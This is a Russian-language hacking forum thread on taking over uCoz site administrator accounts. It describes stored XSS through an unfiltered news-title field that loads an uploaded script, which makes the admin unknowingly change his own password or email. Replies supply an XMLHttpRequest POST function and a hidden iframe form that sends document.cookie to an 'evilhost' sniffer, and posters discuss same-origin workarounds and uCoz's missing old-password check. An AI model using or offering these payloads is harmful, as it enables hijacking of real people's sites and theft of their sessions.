Все мы знаем, что UcoZ неприступный и уже все головы сломали (ломают) как его взломать. Cookie админа украсть не проблема, даже если на форуме выключены HTML теги. Но! По умолчанию в UcoZ стоит привязка IP к админу. Тоесть куки то мы украли, но войти не сможем. А админ не станет эту привязку просто так отключать. Но привязка IP модератора по умолачнию выключена. так что вы можете украсть куки модератора, войти под его логином, и удалить все темы, новости, и.т. д. По идее то нам зачастую это и нужно - насолить бедной жертве =))) Но нам это неподходит. Двигаемся дальше. А что если админ сам себе, не подозревая того, сменит свой пароль на нужный нам? =) Именно так мы и поступим. Дело в том, что в форме добавления новостей не фильтруется поле "Название материала". А что мы можем с этим сделать? Можно здесь вставить скрипт перенаправки на сниффер, но нам то куки админа ненужны. А вот что! =) Мы внедрим файл в заголовок нашей "злой" новости! Создаем любой файлик. И в него вписываем код. В этом коде будет содержаться POST запрос с помощью ActiveX. Код мы вписали. Теперь заливаем его на сайте который хотим взломать. Это можно сделать например так: Зайти на форум. В форме написания сообщения прикрпеить наш файл( там есть кнопочка "Обзор", вот через нее надо прикреплять) Сообщение напишите произвольное. Когда нажмете отправить, увидите свое сообщение, а чуть нижу будет написано " Прикрепления: "название файла", его размер". Наведите курсор на название этого файлика и увидите в нижнем левом углу ссылку на этот файл. Незнаю как у вас, а у меня, в Фаерфоксе, можно сделать так: Клик правой кнопкой по ссылке на файл, выбираю там пункт "Копировать ссылку". И все, ссылку у меня в буфере обмена. Ну а у кого неть такой функции, придется набирать ссылку ручками =) Теперь идем создавать новость. Новость напишите произвольную. Это не имеет значения, нас интересует строка "Название материала". Туда вписываем <script src="../путь до файла"></script> Например у меня так: <script src="../_fr/0/0962166.img"></script> Видите у меня полсе ...src=" стоят 2 точки? Это не обозначает "адрес сайта который надо взломать"! Так UcoZ воспринимает адрес самого сайта (главной страницы). И вуаля! пароль изменен нам на нужный Вот только пожалуйста не кричите на меня, но я незнаю кода, для POST запроса. Я с ним не в ладах)) Если кто может сделать этот код, то пишите тут! Собственно для этого я и сделал тему) Вообщем нам надо только сделать этот код, и вставить его в файлик, который потом заливать будем на сайт! И Все! Считай неприступный UcoZ взломан
я конечно не знаком с системой ucoz, но вроде везде где идет смена пароля требуеться вести старый для подтвержения. И в src можно указывать любой валидный url, не обязательно атачить на это же сайт js файл, легчше на свой сайт залить и в src его указать. Вот самый простинкий ajax запрос: PHP: url="admin.php";// адрес куда будем передовать function sendRequest(params)// в params переменые передоваемы в пост запросе { if(params!==""){ req=initXMLHTTPRequest(); if (req) { req.onreadystatechange=somedo; req.open("POST",url,true); req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); req.send(params);} } } function initXMLHTTPRequest() { var xRequest=null; if (window.XMLHttpRequest){ xRequest=new XMLHttpRequest(); } else if (window.ActiveXObject){ xRequest=new ActiveXObject ("Microsoft.XMLHTTP"); } return xRequest; } function somedo() { }
Лучше сделать через обычный csrf- автосабмит формы, потому как XMLHTTPRequest не отправит запрос на сторонний домен(если этот файл не приаттачить)
мм, если он создаст на том же сайте <script type="text/javascript" src="http://любой_сайт/path/script.js"></script> и регьюст будет идти на тот же доменик то все отправиться(а имено это описал ТС)
ТС, ActiveX работает только в IE. Same Origin Policy не позволяет делать AJAX-запросы на удаленные сайты, поэтому в <script src=""> необходимо указывать скрипт, находящийся в пределах того же хоста. Универсальный способ отправить POST-запрос с помощью html и js: PHP: <iframe width=0 height=0 id=lol name=lol></iframe> // создаем невидимый iframe для того, чтобы отправка формы не вызывала перезагрузку страницы <form name=myform method=post target=lol> // создаем форму, в которой target - это наш iframe <input type=hidden name=c> // здесь любые данные, в данном случае cookie </form> <script> // теперь очередь js document.myform.action='http://evilhost/snif.php'; // устанваливаем action на наш сервер document.myform.c.value=document.cookie; // записываем в hidden-поле данные cookie пользователя document.myform.submit(); // отправляем форму </script> так работать не будет!
Razor нам ненужны Куки. Нам надо, чтобы через этот пост запрос админ переходил в свой профиль, и менял свой пароль. Я точно непомню, но вроде переменная, в которой вводится праоль там называется passw. Но, я сейчас придумал другой варинат. Если неполучится изменить переменную пассв, то можно поменять не пароль а e-mail на свой. Потом сказать что ты типо забыл пароль и тебе на e-mail придет письмо. =) Ну зарегайте любой сайт на Укозе, это быстро же и покапайтесь =) ucoz.ru Но, я вроде уже придумал код, но сегодня выложить немогу, ждите до завтра )))))
БРЕД, ТАК РАБОТАТЬ БУДЕТ,И ЭТО МНОЮ УЖЕ ПРОВЕРЯЛОСЬ НЕ ОДНОКРАТНО!!! ДРУГОЕ ДЕЛО ЕСЛИ ВЫ ИСПОЛЬЗУЕТЕ В САМОМ XMLHTTPRequest запрос к другому домену то да, этого сделать не получиться. ЕСЛИ НЕ ВЕРИТЕ Я МОГУ УСТРОИТЬ МАЛЕНЬКУЮ ДЕМОНТСРАЦИЮ ЭТОГО Вот почитайте http://javascript.ru/ajax/cross-domain-scripting мм, если вы подразумеваете что XMLHTTPRequest в старых браузерах от ие был не native object а вызывался через ActiveX, то да, но если вы посмотрите на код, то там идет проверка на это, в остальных браузерах с подержкой XMLHTTPRequest он идет как native object и в новых версиях ИЕ.
Возможно запрос будет выглядеть так (полный код на 1 странице давал "Какуна Матата") ...... if(params!==passw="123456"){ req=initXMLHTTPRequest(); if (req) { ..... Или нет? Если нам нужно отправить переменнуб passw то как будет выглядеть код?
Я бы не назвал это столь большой новостью. На uCoz и правда не идет запрос на ввод старого пароля, при установке нового. Также при изменении инфы не требуется вводить капчу. Давно замечал это. Передача новых личных данных идет в формате multipart/form-data и передается довольно много параметров.
А это и никто и не называет большой новостью. Большой новостью называют, то что можно через запросы сменить пароль админа. Или его е-мэил.
Матата, он имел ввиду что нужно указывать ссылку на скрипт находящийся в пределах хоста. А в самом скрипте можно указывать на любой скрипт. Я так понял)))
Ты понял все с точностью до наоборот. Как раз сылку в src можно указывать на любой хост а в самом скрипте при XMLHTTPRequest только на данный домен до буковки, то есть www.test.ru и test.ru уже будут считаться разными доменами, поэтому лутчше всегда узать location.host